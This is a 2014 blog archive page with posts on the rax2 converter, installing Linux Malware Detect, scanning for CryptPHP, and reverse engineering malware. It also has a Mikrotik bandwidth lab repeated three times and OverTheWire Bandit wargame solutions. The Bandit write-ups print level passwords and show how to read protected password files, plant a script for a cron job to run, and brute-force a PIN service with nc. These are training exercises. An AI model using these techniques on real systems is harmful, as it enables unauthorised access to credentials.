Monthly Archives: December 2014

Base Conversion and Rax2 (Radare2 Framework)

As a reverse engineer, we are often face various number in various base and then the need to do conversion rise. We need a handy and simple calculator and converter tool to convert numbers from different bases, change the endianness, etc. Our shell and linux might ship this capability but not as flexible as we want.

Fortunately ‘rax2′ utility comes with Radare2 Framework for a good use. Rax aims to be a minimalistic expression evaluator for the shell and can be used for making base conversions easily between floating point values, hexadecimal representations, hexpair strings to ascii, octal to integer, etc.

In this article we will discuss about some of Rax2 capability.

Invocation

rax2 is a single utility program. We can invoke it directly in our terminal. If no arguments given, rax2 can run on interactive mode.

Let’s see the help.

rax2 -h

And what we see in out screen:

Usage: rax2 [options] [expr ...]
  =[base]                 ;  rax2 =10 0x46 -> output in base 10
  int   ->  hex           ;  rax2 10
  hex   ->  int           ;  rax2 0xa
  -int  ->  hex           ;  rax2 -77
  -hex  ->  int           ;  rax2 0xffffffb3
  int   ->  bin           ;  rax2 b30
  int   ->  ternary       ;  rax2 t42
  bin   ->  int           ;  rax2 1010d
  float ->  hex           ;  rax2 3.33f
  hex   ->  float         ;  rax2 Fx40551ed8
  oct   ->  hex           ;  rax2 35o
  hex   ->  oct           ;  rax2 Ox12 (O is a letter)
  bin   ->  hex           ;  rax2 1100011b
  hex   ->  bin           ;  rax2 Bx63
  hex   ->  ternary       ;  rax2 Tx23
  raw   ->  hex           ;  rax2 -S < /binfile
  hex   ->  raw           ;  rax2 -s 414141
  -b    binstr -> bin     ;  rax2 -b 01000101 01110110
  -B    keep base         ;  rax2 -B 33+3 -> 36
  -d    force integer     ;  rax2 -d 3 -> 3 instead of 0x3
  -e    swap endianness   ;  rax2 -e 0x33
  -f    floating point    ;  rax2 -f 6.3+2.1
  -F    stdin slurp C hex ;  rax2 -F < shellcode.c
  -h    help              ;  rax2 -h
  -k    randomart         ;  rax2 -k 0x34 1020304050
  -n    binary number     ;  rax2 -n 0x1234 # 34120000
  -N    binary number     ;  rax2 -N 0x1234 # x34x12x00x00
  -s    hexstr -> raw     ;  rax2 -s 43 4a 50
  -S    raw -> hexstr     ;  rax2 -S < /bin/ls > ls.hex
  -t    tstamp -> str     ;  rax2 -t 1234567890
  -x    hash string       ;  rax2 -x linux osx
  -u    units             ;  rax2 -u 389289238 # 317.0M
  -v    version           ;  rax2 -V

Compact yet informative.

Number Representations

Mathematical constants are simply fixed values we write, such as: 1, 135, 182, 666, etc. It can be represented in various format / base. Some common representations (in computer science) are: binary, octal, decimal, hexadecimal.

Let’s see some example.

$ rax2 0x345
837
$ rax2 837
0x345
$ rax2 44.44f
Fx8fc23142 
$ rax2 0xfffffffd
-3
$ rax2 -3
0xfffffffd 
$ rax2 -s "41 42 43 44"
ABCD

Decimal number are written as is. The hexadecimal number has 0x prefix on them. We also see 44.44f which is a decimal floating point number (suffix f) and then converted to the hexadecimal representation Fx8fc23142 (with prefix Fx). As you can see, prefix and suffix give important meaning to the conversion. List of all prefix and suffix can be seen on rax2 usage.

Endianness

Endianness (Big Endian and Little Endian) define interpretation of the bytes making up a data word when those bytes stored in computer memory.

Suppose we have value 0x12345678. This is 8 byte value (32-bit) and if we split it into byte, we have 4 bytes. Thus we have 4 bytes: 12, 34, 56, 78 where each byte requires 2 hex digits. The number will be stored differently in Big Endian system and Little Endian system.

Data are written in memory location, using the smallest unit available: byte. Computer are a big array of chunks, addressable by memory address. Memory address is like another number and range from low address to high address.

In Big Endian, you store the most significant byte in the smallest address. In our case, 0x12345678 will be seen as this:

hex1

In Little Endian, things will be different. You store the least significant byte in the smallest address. Here’s how the same value represented:

hex2

Notice that Little Endian is in the reverse order compared to Big Endian.

The good news is, in addition to convert base rax2 can also convert value from one endianness to another endianness. It’s as easy as invoking rax2 with -e argument. For example:

$ rax2 0x12345678
305419896

$ rax2 -e 0x12345678
2018915346

Cara Install Malware Detect (LMD) di CentOS 6

Selamat malam, artikel ini sambungan dari artikel sebelumnya tentang “CryptPHP PHP Malware Attack”

Adanya Malware atau Shell Script memang sangat mengganggu terlebih keberadaannya yang akan membahayakan server atau data yang berada didalamnya. Untuk itu keberadaan tools yang akan membantu kita dalam meminimalisir keberadaan malware sangatlah dibutuhkan.

LMD atau Linux Malware Detect bisa menjadi salah satu tools yang bisa kita gunakan.

CATATAN: Pastikan anda memiliki akses console/SSH dengan akses root, Tutorial dibawah ini juga sudah dicoba pada OS Cloudlinux.

Download LMD

cd /usr/local/src
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz

 

Install LMD
Jalankan perintah dibawah ini

tar xfz maldetect-current.tar.gz
cd maldetect-*
./install.sh

Outpunya kurang lebih seperti dibawah ini:

root@server# ./install.sh
 Linux Malware Detect v1.4.2
 (C) 2002-2013, R-fx Networks <proj@r-fx.org>
 (C) 2013, Ryan MacDonald <ryan@r-fx.org>
 inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
 This program may be freely redistributed under the terms of the GNU GPL
installation completed to /usr/local/maldetect
 config file: /usr/local/maldetect/conf.maldet
 exec file: /usr/local/maldetect/maldet
 exec link: /usr/local/sbin/maldet
 exec link: /usr/local/sbin/lmd
 cron.daily: /etc/cron.daily/maldet
maldet(776396): {sigup} performing signature update check...
 maldet(776396): {sigup} local signature set is version 201205035915
 maldet(776396): {sigup} new signature set (2014060827500) available
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/md5.dat
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/hex.dat
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/rfxn.ndb
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/rfxn.hdb
 maldet(776396): {sigup} downloaded http://cdn.rfxn.com/downloads/maldet-clean.tgz
 maldet(776396): {sigup} signature set update completed
 maldet(776396): {sigup} 11744 signatures (9855 MD5 / 1889 HEX)

Konfigurasi
Ada beberapa hal yang harus disetup, berikut langkah-langkahnya:

nano /usr/local/maldetect/conf.maldet

Opsi yang harus diupdate:

  • email_alert=1
  • email_addr=”webmaster@mydomain.com”
  • quar_hits=1

 
Jalankan LMD
Secara default, cron harian sudah dibuat namun untuk memastikan LMD berjalan maka kita bisa menjalankan LMD secara manual dengan perintah dibawah ini :

/usr/local/sbin/maldet --scan-all /home

Perintah diatas adalah untuk scanning pada /home

Untuk melakukan penyesuaian pada cron LMD harian, bisa dilakukan pada file /etc/cron.daily/maldet

Selamat mencoba bro :)
sumber cpanelku

Scan CryptPHP PHP Malware Attack

Selamat malam & akhir tahun bro, asik – asik. gak terasa udah setahun lebih nhi blog haha, oh iya pembahasan kali ini tentang CryptPHP PHP Malware Attack.

Apabila tiba-tiba IP masuk dalam database spamhaus, maka patut ditindaklanjuti karena kini sedang marak serangan malware dari CryptPHP PHP.

Bagaimana menindaklanjuti CryptPHP PHP ini? berikut langkahnya:

Cek IP di www.spamhaus.org, Apabila ip kita masuk dalam list, silakan untuk klik link informasi yang diberikan spamhaus

Script findbot

findbot.pl merupakan script perl yang dibuat untuk mencari file yang telah terinfeksi dari malware CryptPHP PHP, selain itu juga bisa mencari file-file seperti r57shell, cryptphp dst.

Pastikan perl telah terinstal dengan baik

Download findbot.pl :

wget http://cbl.abuseat.org/findbot.pl

 

Jalankan perintah:

perl findbot.pl -c

 
Find Command :

find /home/ -name "social*.png" -exec grep -q -E -o 'php.{0,80}' {} ; -exec

 
Thanks for BennyKusman DiskusiWebhosting.com

Reverse Engineering Hostile Codes

Computer criminals are always ready to compromise weakness in the system with their hostile codes. Computer Viruses, Worms, Trojans, Malwares, you name it. Often these programs are custom compiled and not widely distributed. Because of this, anti-virus software won’t detect their presences.

In this article we will try to outlines the process of reverse engineering hostile codes. Hostile codes mean any process running on a system that is not authorized by the system administrators. However, our scope will be limited. This article is not intended to be an in-depth tutorial, rather a description of the tools and steps involved.

Tools

There are many tools which can be used for reverse engineering. Reverse engineering can be done in both Unix and Windows platform. However, Unix is still the ideal platform in my opinion. If you are installing Cygwin on Windows, you can emulate Unix environment and do what you can do in Unix.

Going to Windows route will cost lot of money to us where as most of solutions are all free and open source.

Some useful commands based on their categories:

  1. Disk Image Tool – To create disk image, convert and copy a file byte-to-byte. Useful to perform analysis on a compromised system’s disk without affecting the integrity of evidence of the intrusion. Solution in this category: dd.
  2. File Type Identifier – Identifies the type of a file. Identification should rely on magic number used in some part of the file, rather than rely on file extension. Solution in this category: file.
  3. String Identifier – Outputs readable strings from file. Strings might reside in data section or event code section. Solution in this category: strings
  4. Hex Editor – Read and edit binary files. Solution in this category: okteta, HexRay.
  5. Checksum – Creates a unique checksum for comparison purpose. Solution in this category: md5sum, sha1sum, sha256sum.
  6. Diff Tools – Show differences between files. Solution in this category: diff.
  7. Files Monitors – Show all open files and sockets by process. Solution in this category: lsof
  8. Packet Sniffer – Sniffing network packet and traffic to/from machine. Solution in this category: tcpdump, wireshark.
  9. String Search – Search for strings within a file. Solution in this category: grep.
  10. Packer/Unpacker – see Packer section.
  11. Decompiler – see Decomilation.
  12. Disassembler – see Disassembler.

Packer

Malwares are often compressed with an executable packer. This not only makes the code more compact, but also prevets much of the internal string data from being viewed. The most commonly used packer is UPX, which can compress Linux of Windows binaries. Other solutions are available, but they are typically Windows only packer. Good thing is, UPX provide manual decompression to restore the original image. This saves lot of times.

In an ordinary executable, running the “strings” command or examining the malwares with hexeditor should show many readable and complete strings in the file. If we see random characters or mostly truncated and scattered pieces of text, most likely the executables has been packed. Find string “UPX” somewhere in the file to confirm UPX packer involved here. You may want to deal with one of the many other executable packers.

Decompilation

Some malwares might be written in an interpreted or semi-interpreted language such as .NET, Java, etc. You can consider yourself being lucky. There are tools available to decompile these languages to varying degrees.

  • .NET – Microsoft flagship platform for programming. Some decompiler exists around such as ILSpy, dotPeek, etc.
  • Visual Basic – More precisely, Visual Basic before the era of .NET. Visual Basic application is assembled into so called PCode. One of Visual Basic PCode decompiler is P32Dasm.
  • Java – Next infamous cross platform. There is an excellent decompiler jad. Several other known decompilers exist such as: JD, Mocha, JEB Decompiler (for android APK).
  • Delphi – The Pascal in different way. Delphi is once become de facto Rapid Application Development standard. Several decompiler exists, such as DeDe, DE Decompiler, Interactive Delphi Reconstructor.

Some popular interpreted language can be compiled to native codes. And also, there are some tools for decompiling them. While malware engineered using these language are rarely seen, it’s good choice to keep the tools on our arsenal.

If malwares are written in native codes using compiled language, there is chance we can decompile it. Hex-Rays decompiler is one of tool serves this purpose. The Hex Rays decompiler is a plug-ing for IDA Pro, so we should have IDA Pro first. Another option available is Boomerang Decompiler.

However please keep in mind that there is no guarantee that decompilation will return the code as is.

Disassembling

Native code decompiler might exists, however as said before decompilation won’t give guarantee the code returned as is. Our next option is disassembler. These tools work by disassembly the executables into assembly code. For Unix we can use objdump and some of its wrapper like dasm. For windows we can use W32dasm. Some multi platform tool exists, such as IDA Pro and Radare2. These programs will disassemble our code then match up strings in the data segment to where they are used in the program, as well show us separation between subroutines.

Debuggers

Deadlisting can be quite valuable, but we still want to debug  the code, especially if the malware is communication via network sockets. Debuggers give us access to the memory and temporary variables stored in the program, as well as all data it is sending and receiving from socket communication.

On Unix land, there is gdb debugger. Under Windows, the choices are far more varied, but most tutorials on reverse engineering under Win32 land use OllyDbg and SoftICE.

Environment Preparation

Running hostile codes must be done with more precautions, even under debugger. Never debug malwares on production machine or network. Ideally, a lab network specially created for this is recommended. Here is the minimal network configuration recommended:

reverseengineeringtrojans1

The debug system should have a clean install of whatever Operating System the malware is intended for. The Firewall is used to protect the network from unwanted incident from outside. Ensure that you firewall all outbound connections, allowing only the Trojan’s control connection through. If you don’t want the master controller to know your lab network is running the Trojan, you can set up services to mimic the resources the Trojan needs, such as an IRC or FTP/TFTP server. The third machine on the network is sniffer which emulate the service and also acts to capture the network traffic generated by the malwares.

Debugging Process

Key-Function Search

First, we skim the code and search for particular interesting function used. We look for key function such as Winsock and file I/O calls. Then we search the occurrence or where are our key-functions invoked. Let the debugger breakpoints on them. There we can interrupt the flow of the program and examine memory and CPU registers at that point.

Running the Code

One of the case we want to inspect is how the malwares communicates with other. Or maybe how the malware communicates with its controller. Often, sniffing the network traffic will be sufficient. However, many newer Trojans are incorporating encryption into their network traffic, making network sniffing useless. However, with some cleverness we can grab the messages from memory before they are encrypted. By setting a breakpoint on the “send” socket library call, we can interrupt the code just prior to the packet being sent. Then, by getting a stack trace, we can see where we are in the program.

Another thing we should consider is the payload or what the malwares do. Poking through file system and access interesting system calls might interest us.

[LAB 6] : KONFIGURASI SIMPLE BANDWITH MANAGEMENT DI MIKROTIK (QOS)

Assalamulaikum WR WB
Selamat malam

Hari ini saya akan menjelaskan apaitu memanajemen bandwith jaringan yang ada dan memberikan contoh konfigurasinya menggunakan Simple Bandwith Manajemen. 

Penjelasan



Dalam mengelola sebuah jaringan yang ada, sangat penting sekali untuk mengelola bandwith yang ada pada jaringan tersebut. Sebagai seorang Networtk Engineer tentu tidak ingin mendapatkan komplain dari banyak orang di kantor hanya karena internet yang diakses lemot dan sebagainya. Maka dari itu pengelolaan bandwith yang benar sangatlah penting. 

Router Mikrotik memiliki fitur bernama queue yang berfungsi untuk mengelola bandwith pada jaringan. Dengan begitu pendistribusian bandwith ke setiap client bisa menjadi termanage dan terkelola dengan baik. 

Pada case kali ini saya memiliki bandwith sebesar 1 MB untuk download dan 1 MB untuk upload. Bandwith itu saya ingin distribusikan kesetiap client yang ada. saya memiliki 10 client yang akan mendapat jatah bandwith tersebut. Setiap client mendapatkan masing-masing 128K untuk download dan 128K untuk upload. Berikut ini konfigurasi pengelolaan bandwith pada Mikrotik : 

Konfigurasi 

Sesuai case diatas berikut ini konfigurasi Simple Bandwith Management di Mikrotik :


Terlihat pada konfigurasi diatas, terdapat range IP Address client dari 192.168.1.10 sampai dengan 192.168.1.19. Dengan setiap IP Address diberi nama dengan "user-1" sampai dengan "user-10". Yang lebih penting lagi adalah syntax "max-limit" yang digunakan sebagai parameter maximum bandwith yang didapat untuk download/upload. 

Verifikasi 

Setelah melakukan konfigurasi Simple Bandwith. Kita akan memverifikasi konfigurasi yang sudah dibuat tadi


Hasil Konfigurasi

Berikut ini hasil konfigurasi Simple Bandwith diatas :


Terlihat client dengan IP Address 192.168.1.20 hanya mendapatkan bandwith sebesar 122K saja tidak melebihi dari max-limit yang dikonfigurasikan tadi yaitu 128K. 

Simple Bandwith dengan Penggunaan Waktu

Konfigurasi Simple Bandwith tersebut bisa kita tambahkan lagi dengan menggunakan parameter waktu. Jadi kita bisa menentukan besaran bandwith yang didapat oleh client diwaktu-waktu tertentu. Konfigurasi ini sangat membantu sekali untuk jam-jam kerja sebuah perusahaan. Berikut konfigurasi tsb :


Konfigurasi diatas sebenarnya sama saja dengan konfigurasi sebelumnya, hanya saja ditambahkan syntax "time" untuk mendeskrisikan jam berapa sampai jam berapa dan dari hari apa sampai hari apa. Konfigurasi diatas kebetulan menggunakan jam 8 pagi hingga jam 17 sore, sedangkan hari dimulai dari hari senin hingga jumat. Berikut ini hasil verifikasi konfigurasi tsb :


Simple Bandwith dengan Priority

Simple Bandwith juga memiliki fitur lain yaitu sebuah priority. Priority didalam mikrotik memiliki skala prioritas 1 sampai dengan 8, dan tentu saja priority 1 adalah prioritas tertinggi diantara yang lain. Pada konfigurasi sebelumnya priority selalu saja diberi skala prioritas 8. Itu karena apabila kita tidak memberi nilai priority pada sebuah limit maka mikrotik secara default mengisinya dengan priority 8. Untuk lebih jelasnya berikut konfigurasi tsb :


Pada konfigurasi diatas terlihat user 1 dengan IP address 192.168.1.10 memiliki prioritas tertinggi yaitu 1. jadi apabila user semua user sedang menggunakan internet maka client yang menjadi prioritas pengelolaan bandwith adalah user 1 karena itu tadi memiliki skala prioritas nomor 1. 

Berikut verifikasi konfigurasi diatas :



Demikianlah penjelasan tentang Simple Bandwith Managemen di Mikrotik. Semoga bisa bermanfaat untuk para pembaca sekalian. Terima kasih sudah bersedia mampir di blog saya. :)

Selamat Malam

Wassalamualaikum WR WB

Refrensi :

Moch. Linto Herlambang & Aziz Catur L. 2008. Panduan lengkap Mikrotik RouterOS. Yogyakarta. ANDI

Rendra Towidjojo. 2013. Mikrotik Kungfu Kitab 1. Jakarta. Jasakom

[LAB 6] : KONFIGURASI SIMPLE BANDWITH MANAGEMENT DI MIKROTIK (QOS)

Assalamulaikum WR WB
Selamat malam

Hari ini saya akan menjelaskan apaitu memanajemen bandwith jaringan yang ada dan memberikan contoh konfigurasinya menggunakan Simple Bandwith Manajemen. 

Penjelasan



Dalam mengelola sebuah jaringan yang ada, sangat penting sekali untuk mengelola bandwith yang ada pada jaringan tersebut. Sebagai seorang Networtk Engineer tentu tidak ingin mendapatkan komplain dari banyak orang di kantor hanya karena internet yang diakses lemot dan sebagainya. Maka dari itu pengelolaan bandwith yang benar sangatlah penting. 

Router Mikrotik memiliki fitur bernama queue yang berfungsi untuk mengelola bandwith pada jaringan. Dengan begitu pendistribusian bandwith ke setiap client bisa menjadi termanage dan terkelola dengan baik. 

Pada case kali ini saya memiliki bandwith sebesar 1 MB untuk download dan 1 MB untuk upload. Bandwith itu saya ingin distribusikan kesetiap client yang ada. saya memiliki 10 client yang akan mendapat jatah bandwith tersebut. Setiap client mendapatkan masing-masing 128K untuk download dan 128K untuk upload. Berikut ini konfigurasi pengelolaan bandwith pada Mikrotik : 

Konfigurasi 

Sesuai case diatas berikut ini konfigurasi Simple Bandwith Management di Mikrotik :


Terlihat pada konfigurasi diatas, terdapat range IP Address client dari 192.168.1.10 sampai dengan 192.168.1.19. Dengan setiap IP Address diberi nama dengan "user-1" sampai dengan "user-10". Yang lebih penting lagi adalah syntax "max-limit" yang digunakan sebagai parameter maximum bandwith yang didapat untuk download/upload. 

Verifikasi 

Setelah melakukan konfigurasi Simple Bandwith. Kita akan memverifikasi konfigurasi yang sudah dibuat tadi


Hasil Konfigurasi

Berikut ini hasil konfigurasi Simple Bandwith diatas :


Terlihat client dengan IP Address 192.168.1.20 hanya mendapatkan bandwith sebesar 122K saja tidak melebihi dari max-limit yang dikonfigurasikan tadi yaitu 128K. 

Simple Bandwith dengan Penggunaan Waktu

Konfigurasi Simple Bandwith tersebut bisa kita tambahkan lagi dengan menggunakan parameter waktu. Jadi kita bisa menentukan besaran bandwith yang didapat oleh client diwaktu-waktu tertentu. Konfigurasi ini sangat membantu sekali untuk jam-jam kerja sebuah perusahaan. Berikut konfigurasi tsb :


Konfigurasi diatas sebenarnya sama saja dengan konfigurasi sebelumnya, hanya saja ditambahkan syntax "time" untuk mendeskrisikan jam berapa sampai jam berapa dan dari hari apa sampai hari apa. Konfigurasi diatas kebetulan menggunakan jam 8 pagi hingga jam 17 sore, sedangkan hari dimulai dari hari senin hingga jumat. Berikut ini hasil verifikasi konfigurasi tsb :


Simple Bandwith dengan Priority

Simple Bandwith juga memiliki fitur lain yaitu sebuah priority. Priority didalam mikrotik memiliki skala prioritas 1 sampai dengan 8, dan tentu saja priority 1 adalah prioritas tertinggi diantara yang lain. Pada konfigurasi sebelumnya priority selalu saja diberi skala prioritas 8. Itu karena apabila kita tidak memberi nilai priority pada sebuah limit maka mikrotik secara default mengisinya dengan priority 8. Untuk lebih jelasnya berikut konfigurasi tsb :


Pada konfigurasi diatas terlihat user 1 dengan IP address 192.168.1.10 memiliki prioritas tertinggi yaitu 1. jadi apabila user semua user sedang menggunakan internet maka client yang menjadi prioritas pengelolaan bandwith adalah user 1 karena itu tadi memiliki skala prioritas nomor 1. 

Berikut verifikasi konfigurasi diatas :



Demikianlah penjelasan tentang Simple Bandwith Managemen di Mikrotik. Semoga bisa bermanfaat untuk para pembaca sekalian. Terima kasih sudah bersedia mampir di blog saya. :)

Selamat Malam

Wassalamualaikum WR WB

Refrensi :

Moch. Linto Herlambang & Aziz Catur L. 2008. Panduan lengkap Mikrotik RouterOS. Yogyakarta. ANDI

Rendra Towidjojo. 2013. Mikrotik Kungfu Kitab 1. Jakarta. Jasakom

[LAB 6] : KONFIGURASI SIMPLE BANDWITH MANAGEMENT DI MIKROTIK (QOS)

Assalamulaikum WR WB
Selamat malam

Hari ini saya akan menjelaskan apaitu memanajemen bandwith jaringan yang ada dan memberikan contoh konfigurasinya menggunakan Simple Bandwith Manajemen. 

Penjelasan



Dalam mengelola sebuah jaringan yang ada, sangat penting sekali untuk mengelola bandwith yang ada pada jaringan tersebut. Sebagai seorang Networtk Engineer tentu tidak ingin mendapatkan komplain dari banyak orang di kantor hanya karena internet yang diakses lemot dan sebagainya. Maka dari itu pengelolaan bandwith yang benar sangatlah penting. 

Router Mikrotik memiliki fitur bernama queue yang berfungsi untuk mengelola bandwith pada jaringan. Dengan begitu pendistribusian bandwith ke setiap client bisa menjadi termanage dan terkelola dengan baik. 

Pada case kali ini saya memiliki bandwith sebesar 1 MB untuk download dan 1 MB untuk upload. Bandwith itu saya ingin distribusikan kesetiap client yang ada. saya memiliki 10 client yang akan mendapat jatah bandwith tersebut. Setiap client mendapatkan masing-masing 128K untuk download dan 128K untuk upload. Berikut ini konfigurasi pengelolaan bandwith pada Mikrotik : 

Konfigurasi 

Sesuai case diatas berikut ini konfigurasi Simple Bandwith Management di Mikrotik :


Terlihat pada konfigurasi diatas, terdapat range IP Address client dari 192.168.1.10 sampai dengan 192.168.1.19. Dengan setiap IP Address diberi nama dengan "user-1" sampai dengan "user-10". Yang lebih penting lagi adalah syntax "max-limit" yang digunakan sebagai parameter maximum bandwith yang didapat untuk download/upload. 

Verifikasi 

Setelah melakukan konfigurasi Simple Bandwith. Kita akan memverifikasi konfigurasi yang sudah dibuat tadi


Hasil Konfigurasi

Berikut ini hasil konfigurasi Simple Bandwith diatas :


Terlihat client dengan IP Address 192.168.1.20 hanya mendapatkan bandwith sebesar 122K saja tidak melebihi dari max-limit yang dikonfigurasikan tadi yaitu 128K. 

Simple Bandwith dengan Penggunaan Waktu

Konfigurasi Simple Bandwith tersebut bisa kita tambahkan lagi dengan menggunakan parameter waktu. Jadi kita bisa menentukan besaran bandwith yang didapat oleh client diwaktu-waktu tertentu. Konfigurasi ini sangat membantu sekali untuk jam-jam kerja sebuah perusahaan. Berikut konfigurasi tsb :


Konfigurasi diatas sebenarnya sama saja dengan konfigurasi sebelumnya, hanya saja ditambahkan syntax "time" untuk mendeskrisikan jam berapa sampai jam berapa dan dari hari apa sampai hari apa. Konfigurasi diatas kebetulan menggunakan jam 8 pagi hingga jam 17 sore, sedangkan hari dimulai dari hari senin hingga jumat. Berikut ini hasil verifikasi konfigurasi tsb :


Simple Bandwith dengan Priority

Simple Bandwith juga memiliki fitur lain yaitu sebuah priority. Priority didalam mikrotik memiliki skala prioritas 1 sampai dengan 8, dan tentu saja priority 1 adalah prioritas tertinggi diantara yang lain. Pada konfigurasi sebelumnya priority selalu saja diberi skala prioritas 8. Itu karena apabila kita tidak memberi nilai priority pada sebuah limit maka mikrotik secara default mengisinya dengan priority 8. Untuk lebih jelasnya berikut konfigurasi tsb :


Pada konfigurasi diatas terlihat user 1 dengan IP address 192.168.1.10 memiliki prioritas tertinggi yaitu 1. jadi apabila user semua user sedang menggunakan internet maka client yang menjadi prioritas pengelolaan bandwith adalah user 1 karena itu tadi memiliki skala prioritas nomor 1. 

Berikut verifikasi konfigurasi diatas :



Demikianlah penjelasan tentang Simple Bandwith Managemen di Mikrotik. Semoga bisa bermanfaat untuk para pembaca sekalian. Terima kasih sudah bersedia mampir di blog saya. :)

Selamat Malam

Wassalamualaikum WR WB

Refrensi :

Moch. Linto Herlambang & Aziz Catur L. 2008. Panduan lengkap Mikrotik RouterOS. Yogyakarta. ANDI

Rendra Towidjojo. 2013. Mikrotik Kungfu Kitab 1. Jakarta. Jasakom

OverTheWire.org Wargames – Bandit – Level 20 to Level 29

OverTheWire.org is one of good site offer WarGames. In this context, WarGame is a game specifically designed to help people learn and practice security concepts in the form of fun-filled game. One of wargame category provided by OverTheWire is Bandit category which is aimed at absolute beginners.

This writeup contains solutions of the OverTheWire challenges Bandit category which I solved. The solutions written here is for level 20 above.

Jump Table

How to Play

Bandit, like other games, is organized in levels. We start playing at level 0 and try to “beat” or “finish” it. Finishing a level results in information on how to start the next level. Every level beaten will give clue how to start next level.

There are several things you can try when you are unsure how to continue:

  • First, if you know a command, but don’t know how to use it, try the manual (man page) by entering “man <command>” (without the quotes). e.g. if you know about the “ls” command, type: man ls. The “man” command also has a manual, try it. Press q to quit the man command.
  • Second, if there is no man page, the command might be a shell built-in. In that case use the “help <X>” command. E.g. help cd
  • Also, your favorite search-engine is your friend.
  • Lastly, if you are still stuck, you can join us on IRC

Level 20

ssh bandit20@bandit.labs.overthewire.org

pass: GbKksEFF4yrVs6il55v6gwY5aVje5f0j

There exist an executable file “suconnect”. It makes a connection to localhost on the port we specify as commandline argument. It then reads a line of text from the connection and compares it to the password in the current level. If the password is correct, it will transmit the password for level 21.

All we need to do is run nc listening on a random port, then connect to it with suconnect. Then we send the password throuch the nc session and suconnect sends back the new password.

nc -l 13510 < /etc/bandit_pass/bandit20 &
./suconnect 13510

Level 21

ssh bandit21@bandit.labs.overthewire.org

pass: gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

There is a cron job that we need to look at. In /etc/cron.d there exist some cron files, but our objective is cronjob_bandit22 which look promising. Investigate it to see what this script do.

The script will execute a script on /usr/bin/cronjob_bandit22.sh which will dump /etc/bandit_pass/bandit22 to /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv file.

cat /etc/cron.d/cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Level 22

ssh bandit22@bandit.labs.overthewire.org

pass: Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Another cronjob. This time, the script used by cronjob is copying /etc/bandit_pass/bandit23 as something in /tmp. There’s no need for you to figure out the filename, we can always recreate the condition.

cat /etc/cron.d/cronjob_bandit23
cat /usr/bin/cronjob_bandit23.sh
cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)

Level 23

ssh bandit23@bandit.labs.overthewire.org

pass: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Another cronjob.

In this level, we need to create our own shell script to run. The cronjob script will execute (and later delete) scripts on /var/spool/bandit24. That way, we can create a script on that directory which dump password from /etc/bandit_pass/bandit24 to anywhere we desire. We just need to make sure the script is executable.

The script we create:

#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bandit24xathpass

Then we do:

chmod 777 /etc/bandit_pass/bandit24
cat /tmp/bandit24xathpass

Level 24

ssh bandit24@bandit.labs.overthewire.org

pass: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Another tedious level.

There exist a service running on port 30002. It asks two words: password for bandit25 and secret number 4-digit pincode. Those two words are separate by a space. Our only option is bruteforcing all 10000 combinations.

This is one line command but arranged in multiline for clarity.

for i in {0000..9999}; do 
    echo $i; 
    echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v "separated|Wrong|Exit" >> /tmp/xathrya25.brute; 
    done && cat /tmp/xathrya25.brute

Level 25

ssh bandit25@bandit.labs.overthewire.org

pass: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Not Available Yet.

Level 26

ssh bandit26@bandit.labs.overthewire.org

pass:

Not Available Yet.

Level 27

ssh bandit27@bandit.labs.overthewire.org

pass:

Not Available Yet.

Level 28

ssh bandit28@bandit.labs.overthewire.org

pass:

Not Available Yet.

Level 29

ssh bandit29@bandit.labs.overthewire.org

pass:

Not Available Yet.

OverTheWire.org Wargames – Bandit – Level 10 to Level 19

OverTheWire.org is one of good site offer WarGames. In this context, WarGame is a game specifically designed to help people learn and practice security concepts in the form of fun-filled game. One of wargame category provided by OverTheWire is Bandit category which is aimed at absolute beginners.

This writeup contains solutions of the OverTheWire challenges Bandit category which I solved. The solutions written here is for level 10 to level 19.

Jump Table

How to Play

Bandit, like other games, is organized in levels. We start playing at level 0 and try to “beat” or “finish” it. Finishing a level results in information on how to start the next level. Every level beaten will give clue how to start next level.

There are several things you can try when you are unsure how to continue:

  • First, if you know a command, but don’t know how to use it, try the manual (man page) by entering “man <command>” (without the quotes). e.g. if you know about the “ls” command, type: man ls. The “man” command also has a manual, try it. Press q to quit the man command.
  • Second, if there is no man page, the command might be a shell built-in. In that case use the “help <X>” command. E.g. help cd
  • Also, your favorite search-engine is your friend.
  • Lastly, if you are still stuck, you can join us on IRC

Level 10

ssh bandit10@bandit.labs.overthewire.org

pass: truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

File data.txt is indeed a plaintext. However the password is encoded with base64 inside. Decoding is simple using base64 utility.

base64 -d data.txt

Level 11

ssh bandit11@bandit.labs.overthewire.org

pass: IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

The password is written inside data.txt. This time is is encrypted by ROT13 (or Caesar Cipher). It means every character in the text has been rotated 13 letters. We can use tr utility to reverse it.

cat data.txt | tr '[A-Za-z]' '[N-ZA-Mn-za-m]'

Level 12

ssh bandit12@bandit.labs.overthewire.org

pass: 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

This problem is not hard, but tedious. The direction gives us information that the data has been compressed several way and we need to decompress it accordingly. However we cannot use home directory, thus we use /tmp dirctory to store temporary file.

mkdir /tmp/secretbase
cp ~/data.txt /tmp/secretbase/data.txt
cd /tmp/secretbase
xxd -r data.txt > data.bin
file data.bin
mv data.bin data.gz
gzip -d data.gz
file data
mv data data.bz2
bzip2 -d data.bz2
file data
mv data data.gz
gzip -d data.gz
file data
tar -xvf data
file data5.bin
tar -xvf data5.bin
bzip2 -d data6.bin
file data6.bin.out
tar -xvf data6.bin.out
file data8.bin
mv data8.bin.out
file data8.bin
mv data8.bin data8.gz
gzip -d data8.gz
file data8
cat data8

Level 13

